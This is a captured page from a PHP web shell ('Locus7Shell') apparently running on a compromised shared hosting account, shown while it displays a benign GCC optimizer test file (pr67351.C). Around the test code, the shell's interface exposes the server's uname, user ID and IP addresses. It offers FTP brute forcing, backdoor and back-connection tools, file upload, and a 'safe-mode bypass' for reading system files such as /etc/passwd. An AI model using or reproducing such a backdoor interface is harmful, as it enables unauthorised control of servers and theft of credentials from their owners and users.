Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr67351.C (1.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do compile } */
/* { dg-options "-O2 -fdump-tree-optimized" } */

typedef unsigned char uchar;
typedef unsigned short ushort;
typedef unsigned uint __attribute__((mode (__SI__)));
typedef unsigned long long uint64;

class MyRgba
{
  uint rgba;

public:
    explicit MyRgba (uint c):rgba (c)
  {
  };

  static MyRgba fromRgba (uchar r, uchar g, uchar b, uchar a)
  {
    return MyRgba (uint (r) << 24
           | uint (g) << 16 | uint (b) << 8 | uint (a));
  }

  uchar r ()
  {
    return rgba >> 24;
  }
  uchar g ()
  {
    return rgba >> 16;
  }
  uchar b ()
  {
    return rgba >> 8;
  }
  uchar a ()
  {
    return rgba;
  }

  void setG (uchar _g)
  {
    *this = fromRgba (r (), _g, b (), a ());
  }
};

extern MyRgba giveMe ();

MyRgba
test ()
{
  MyRgba a = giveMe ();
  a.setG (0xf0);
  return a;
}

class MyRgba64
{
  uint64 rgba;

public:
    explicit MyRgba64 (uint64 c):rgba (c)
  {
  };

  static MyRgba64 fromRgba64 (ushort r, ushort g, ushort b, ushort a)
  {
    return MyRgba64 (uint64 (r) << 48
             | uint64 (g) << 32 | uint64 (b) << 16 | uint64 (a));
  }

  ushort r ()
  {
    return rgba >> 48;
  }
  ushort g ()
  {
    return rgba >> 32;
  }
  ushort b ()
  {
    return rgba >> 16;
  }
  ushort a ()
  {
    return rgba;
  }

  void setG (ushort _g)
  {
    *this = fromRgba64 (r (), _g, b (), a ());
  }
};

extern MyRgba64 giveMe64 ();

MyRgba64
test64 ()
{
  MyRgba64 a = giveMe64 ();
  a.setG (0xf0f0);
  return a;
}

/* { dg-final { scan-tree-dump-not "<<" "optimized" } } */
/* { dg-final { scan-tree-dump-not ">>" "optimized" } } */

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.005 ]--